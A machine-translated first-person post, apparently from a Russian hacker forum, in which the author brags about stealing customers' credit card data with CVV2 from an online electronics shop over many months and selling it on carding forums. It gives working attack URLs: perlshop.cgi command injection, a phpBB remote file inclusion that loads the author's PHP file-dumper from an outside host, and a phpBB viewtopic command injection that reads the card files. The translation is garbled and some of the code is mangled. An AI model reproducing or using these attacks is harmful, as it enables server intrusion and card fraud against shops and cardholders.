|
In the deep of my childhood, when there are not a bunch of freaks collapse of the USSR, I heard the phrase "Battle of the harvest".
And now, as I write this article, I realized that this phrase and it will be the title.
You probably know that the hacker earnings, business and non-episodic, at the same time money for food, beer and other pleasures are always needed.
Most customers contact me immediately asks crack paypal.com or ebay.com, suggesting, perhaps, that at least the divine origin of hackers and mine in particular.
Constantly also have their blood hacker can only if the receive instant access to shopping carts multiple stores average daily harvest from removing them and exchanging it for evergreen unit on one of the carding forums, such as Carder-World.ru.
Today, the efforts of the Federal Security Service closed almost all carding forums, including Carder-World.ru, it would be better entrenched Wahhabis and fighters caught, "heroes of cloak and dagger."
And I want to tell the story of a long contest with the administrator of one such shop, which sells electronics.
Episode One.
Over a year ago I discovered a vulnerability in a script perlshop.cgi version = 3.1
http://www.xakep.ru/post/21567/default.asp
the essence of the bug lay in the fact that it was possible to execute commands on the server:
/perlshop.cgi?ACTION=enter&thispage=|ls;&ORDER_ID=!ORDERID!
view source code showed that the opening of the files in the catalog directory occurs without checking for characters |
;
if (defined ($ input { ' THISPAGE'})) {### Send a catalog page back with the unique ID set
$ prev_page = "";
$ next_page = "";
if ($ add_navigation eq 'yes' ) {
$ catalog_page = "$ catalog_directory / $ input { 'THISPAGE'}";
if (-e $ catalog_page) {
open (TEMPLATE, $ catalog_page) ||
& err_trap ( "can not open template file: $ catalog_page");
$ temp = <TEMPLATE>;
if ($ temp = ~ / < (\ \ -! \ -?) PSTAG \ s + prevpage \ s * = \ s * \ "? ([^ \"] +) \ "\ s + nextpage \ s?? * = \ s * \ "( [^ \?"] +?) \ "\ s *? (\ - \ -)> / i?
After reviewing all bazhnye shops, I managed to find one in which the administrator despite the ban, kept credit cards with cvv2.
Knowing that the base with the credo stored by default in the directory customers, every day I pick up a new crop of such a simple way:
/perlshop.cgi?ACTION=ENTER&thispage=|cat%20customers/*;&ORDER_ID=!ORDERID!
Unfortunately the server was neither any wget links, pour the shell and to gain a foothold there, I could not.
But my happiness did not last long, three months after the admin shop felt something was wrong, and once downloading the URL instead cred I saw "oblomingo bird."
Admin replaced on the trolley version = 4.4.0.
Finding it in the internet and viewing the source code, I realized that it will not be my joy, |
He was cut:
open (TEMPLATE, $ catalog_page) or
error_trap ( "can not open template file $ catalog_page: $!");
----------
deleted
----------
# Remove invalid characters from the THISPAGE parameter
$ input { 'THISPAGE'} = ~ s / [| () <>; &] // g;
It is true in the script there is no check on the "null-byte poison".
But as I understand, due to the fact that the script should thispage open files only from the catalog - open (TEMPLATE, $ catalog_page ).
One second.
The hunger and the cold makes people think harder.
Realizing that I cut off the main entrance, I decided to check the spare.
Having broken server ip I saw that it listed more than one hundred sites.
It already gave a chance.
It has begun work on a dull viewing sites.
And one of them showed up PhpBB 2.0.1.
Finding a description of the bug, I quickly pile functions_selects.php loadable buggy forum script install.php:
<? php
$ handle = opendir ( '/' );
echo "Directory handle: $ handle \ n";
echo "Files: \ n";
while ($ file = readdir ($ handle)) {
print "$ file \ n";
$ f = fopen ( "/ $ file", "r");
fpassthru ($ f);
}
closedir ($ handle);
?>
Bay him on durito.narod.ru site includes a directory and running the command
/forum/install.php?m=http://durito.narod.ru/ I got a listing of the root.
Changing the way and filling the modified files to durito.narod.ru I got to the treasured customers directory and its riches.
Life is getting better.
But not for long, five months buggy forum disappeared.
Episode third.
Always want to eat.
And I began again wool server sites for the presence of bugs.
Again luck PhpBB 2.0.8.
And just discovered sql-injection in to the forums PhpBB 2.0.10.
Having dealt with the description of the vulnerability, I once again fall into the inside of the server.
But here I was waiting for the first bummer, customers turned out to be an empty folder.
The second belt is not long in coming, view files in directories yuzersky / home / imya_yuzera / too closed.
View files could only be in the / public_html /.
Then I decided to look perlshop.cgi sources and understand why there was no credit.
Admin suffered a database in / home / imya_yuzera / data / customers, fortunately, I was able to view the contents in it.
? Opening viewtopic.php t = 7 & highlight =% 2527. $ poster = % 60 $ cmd% 60.% 2527 & cmd = cat% 20 / home / imya_yuzera / data / customers / *;
I was very surprised at the basis lying only 2 credit.
Deciding that the shop was ruined, I went to bed.
A few days later I went back, and as he saw that the cart is more credit, but it was the other loan!
I started to observe the store and realized that about 7:30 am the administrator removes all of the data about transactions per day from customers folders only exception is in the resurrection, so this was the only day in the week when I did not get up at 7 am and did not run to a computer that would pick the crop quickly administrator.
So we lived with it "soul to soul" for another six months, I got up half an hour before it, and as stated in the proverb, "early risers - that God gives."
And yesterday, some bastard instead PhpBB 2.0.8 has put on its website vBulletin Version 3.0.8.
Again pink bird oblomingo waved my wing.
But the hacker - Bird patient and Main Kampf is not yet complete for the harvest with the administrator.
ZY
Fight prodozhaetsya, today I found another hole at the host, but will tell about it later
Your bug Durito.
_________________
EAT THE RICH!
| 
